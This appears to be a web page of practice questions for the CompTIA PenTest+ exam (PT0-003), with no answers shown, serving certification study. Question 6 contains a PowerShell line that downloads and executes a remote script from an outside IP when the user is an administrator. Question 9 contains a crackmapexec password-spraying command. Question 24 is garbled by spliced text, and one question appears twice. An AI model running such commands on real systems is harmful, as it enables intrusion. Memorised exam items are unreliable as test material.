New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70percent

CompTIA PT0-003 CompTIA PenTest+ Exam Exam Practice Test

Demo: 39 questions
Total 131 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Question 2

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 3

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

Options:

A.

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

B.

Perform an internal vulnerability assessment with credentials to review the internal attack surface.

C.

Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

D.

Perform a full internal penetration test to review all the possible exploits that could affect the systems.

Question 4

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Options:

A.

Preserving artifacts

B.

Reverting configuration changes

C.

Keeping chain of custody

D.

Exporting credential data

Question 5

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Question 6

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1 ') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.

Change the system's wallpaper based on the current user's preferences.

B.

Capture the administrator's password and transmit it to a remote server.

C.

Conditionally stage and execute a remote script.

D.

Log the internet browsing history for a systems administrator.

Question 7

A penetration tester is attempting to discover vulnerabilities in a company's web application. Which of the following tools would most likely assist with testing the security of the web application?

Options:

A.

OpenVAS

B.

Nessus

C.

sqlmap

D.

Nikto

Question 8

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question 9

While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

Options:

A.

To perform a pass-the-hash attack over multiple endpoints within the internal network

B.

To perform common protocol scanning within the internal network

C.

To perform password spraying on internal systems

D.

To execute a command in multiple endpoints at the same time

Question 10

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 11

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Options:

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Question 12

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

Options:

A.

Enable monitoring mode using Aircrack-ng.

B.

Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

C.

Run KARMA to break the password.

D.

Research WiGLE.net for potential nearby client access points.

Question 13

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Question 14

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube

Question 15

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Question 16

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 17

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Question 18

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Question 19

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?

Options:

A.

Golden Ticket

B.

Kerberoasting

C.

DCShadow

D.

LSASS dumping

Question 20

A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

Options:

A.

53

B.

161

C.

445

D.

3389

Question 21

During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?

Options:

A.

KARMA attack

B.

Beacon flooding

C.

MAC address spoofing

D.

Eavesdropping

Question 22

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Question 23

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

Options:

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Question 24

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

Server High-severity vulnerabilities

1. Development sandbox server 32

2. Back office file transfer server 51

3. Perimeter network web server 14

4. Developer QA server 92

The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Question 25

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

Options:

A.

A generative AI assistant

B.

The customer's designated contact

C.

A cybersecurity industry peer

D.

A team member

Question 26

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Question 27

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

Options:

A.

Creating registry keys

B.

Installing a bind shell

C.

Executing a process injection

D.

Setting up a reverse SSH connection

Question 28

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Question 29

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Question 30

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 31

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Question 32

During a penetration test, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?

Options:

A.

Run TruffleHog against a local clone of the application

B.

Scan the live web application using Nikto

C.

Perform a manual code review of the Git repository

D.

Use SCA software to scan the application source code

Question 33

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 34

A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter. Which of the following types of vulnerabilities could be detected with the tool?

Options:

A.

Network configuration errors in Kubernetes services

B.

Weaknesses and misconfigurations in the Kubernetes cluster

C.

Application deployment issues in Kubernetes

D.

Security vulnerabilities specific to Docker containers

Question 35

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.

Latches

B.

Pins

C.

Shackle

D.

Plug

Question 36

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

Options:

A.

Apply UTF-8 to the data and send over a tunnel to TCP port 25.

B.

Apply Base64 to the data and send over a tunnel to TCP port 80.

C.

Apply 3DES to the data and send over a tunnel UDP port 53.

D.

Apply AES-256 to the data and send over a tunnel to TCP port 443.

Question 37

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Question 38

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Question 39

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX

B.

SOA

C.

DMARC

D.

CNAME

Demo: 39 questions
Total 131 questions